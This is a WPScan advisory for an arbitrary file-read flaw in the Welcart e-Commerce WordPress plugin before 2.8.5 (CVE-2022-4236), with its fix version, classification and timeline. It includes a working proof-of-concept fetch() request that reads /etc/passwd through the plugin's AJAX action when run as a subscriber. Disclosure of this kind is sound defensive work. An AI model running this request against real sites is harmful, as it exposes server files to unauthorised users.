WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access

Description

The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wel_check_progress_ajax&progressfile=/etc/passwd',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

usc-e-shop
Fixed in version 2.8.5

References

CVE
CVE-2022-4236

Classification

Type

FILE DOWNLOAD

OWASP top 10
A1: Injection
CWE
CWE-552

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID
436d8894-dab8-41ea-8ed0-a3338aded635

Timeline

Publicly Published

2022-12-05 (about 5 months ago)

Added

2022-12-06 (about 5 months ago)

Last Updated

2022-12-06 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin